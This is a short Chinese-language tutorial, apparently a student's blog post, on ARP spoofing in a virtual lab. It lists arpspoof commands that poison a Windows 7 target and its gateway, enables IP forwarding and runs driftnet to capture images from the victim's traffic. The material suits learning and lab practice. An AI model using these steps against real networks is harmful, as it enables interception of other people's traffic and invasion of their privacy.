(arpspoof + driftnet)实现arp欺骗
虚拟机环境:kali linux + window 7
前言
ARP欺骗:欺骗局域网内主机的网关MAC地址,使局域网内主机认为攻击机MAC地址是自己的网关MAC地址,导致局域网内主机对外请求流向攻击机,造成网络不通。
一、安装arpspoof和driftnet
arp欺骗工具,这里更新一下数据源和下载安装arpspoof
apt-get update
apt-get install -y dsniff ssldump
另外安装driftnet,一款监听截图工具
apt-get install -y driftnet
二、Attack
1.信息收集
攻击机命令如下:
nmap -T4 -A -v -Pn 192.168.241.0/24
ifconfig //ip配置
ip route show //网关
ping 目标机ip //检查连通性
arp -a //查看arp信息
最后整理数据如下:
攻击机 192.168.241.140 00:0c:29:7d:2d:2a
目标机 192.168.241.133 00:0c:29:f2:11:12
网关 192.168.241.2 00:50:56:f8:d2:2d
2.MAC欺骗与流量截图
MAC欺骗:
arpspoof -t 192.168.241.2 192.168.241.133
此时目标机会断网 开启端口转发,不然目标机无法上网:
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
1
流量截图命令如下:
arpspoof -t 192.168.241.133 192.168.241.2 -i eth0
driftnet -i eth0
试着好久才成功几次,哈哈
总结
又一个暑假没了唉,大三了,本菜狗得回学校继续挣扎了,I just want to be happy…
|